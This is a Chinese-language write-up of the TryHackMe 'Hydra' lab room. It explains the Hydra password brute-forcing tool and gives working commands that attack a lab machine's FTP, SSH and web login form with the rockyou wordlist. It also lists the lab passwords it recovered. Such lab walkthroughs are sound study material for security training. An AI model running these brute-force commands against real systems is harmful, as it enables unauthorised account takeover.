【THM】Hydra(九头蛇-密码破解工具介绍)-学习
本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/hydra
本文相关内容:了解和使用Hydra,它是一个网络登录破解攻击,常用于进行暴力破解以及获取目标网站的登录凭据。
Hydra简介
什么是Hydra(九头蛇)?
Hydra是一个暴力在线密码破解程序,一个针对系统登录密码的快速爆破工具。
我们可以使用Hydra运行一个字典并"暴力破解"一些身份验证服务,想象一下试图在特定服务上手动猜测某人的密码(SSH, Web应用程序登录框, FTP,SNMP),使用 Hydra 运行密码字典以确定正确的密码。
Hydra能够尝试暴力破解以下协议:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle监听器, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP枚举, SNMP v1+v2+v3, SOCKS5, SSH (v1和v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC以及XMPP等。
有关Hydra中每个协议选项的详细信息,请阅读Kali官方的Hydra工具页面:https://en.kali.tools/?p=220
如果你的密码很常见,不包含特殊字符也不超过 8 个字符,则很容易被猜到。存在1 亿个包含常用密码的字典能够被暴力破解工具使用,因此当开箱即用的应用程序使用简单密码登录时,请务必更改默认密码!某些电子摄像头和 web 框架通常会使用 admin:password 作为管理员的默认账户和密码,这显然也不够强大。
安装Hydra
如果你正在使用 Kali Linux,九头蛇是预装的,如果没有--你可以在这里下载:https://github.com/vanhauser-thc/thc-hydra
Hydra简单使用
在TryHackMe中部署目标机器,然后使用浏览器导航到目标站点。
获得信息,目标站点登录页的完整url为:http://10.10.193.62/login
登录页的url信息为:/login
Hydra的命令
我们传递给 Hydra 的参数选项取决于我们正在攻击的服务(协议),例如,如果我们想暴力破解FTP服务并且使用的用户名为 user、密码字典为 passlist.txt,那么可以输入以下命令:
hydra -l user -P passlist.txt ftp://10.10.193.62
对于已部署的目标机器,我们可以针对目标机的SSH服务和Web表单(POST 方法)使用 Hydra的命令。
SSH
hydra -l <username> -P <full path to pass> 10.10.193.62 -t 4 ssh
Post Web 表单
我们也可以使用 Hydra 来暴力破解 Web 表单,但是你必须确保知道它发出的请求类型 - 通常使用 GET 或 POST 方法。 你可以使用浏览器的网络选项卡(在开发者工具中)查看请求类型,或者通过查看源代码得知。
下面是一个使用Hydra命令暴力破解POST 登录表单的例子:
hydra -l <username> -P <wordlist> 10.10.193.62 http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -V
#<>所包含的部分需要换成真实的目标信息
更多使用帮助请查看github相关项目: https://github.com/vanhauser-thc/thc-hydra
操作
问题一:使用 Hydra 暴力破解molly的web 密码,什么是flag1?
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.193.62 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
用户:molly
密码:sunshine
使用获取到的密码,在目标站点的登录页进行登录,登录之后查找flag相关内容:
THM
问题二:使用 Hydra 暴力破解molly的SSH 密码,什么是flag2?
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.193.62 ssh
用户:molly
密码:butterfly
使用获取到的密码,通过SSH服务连接用户molly,查找falg文件并查看内容:
ssh molly@10.10.193.62
THM
答题卡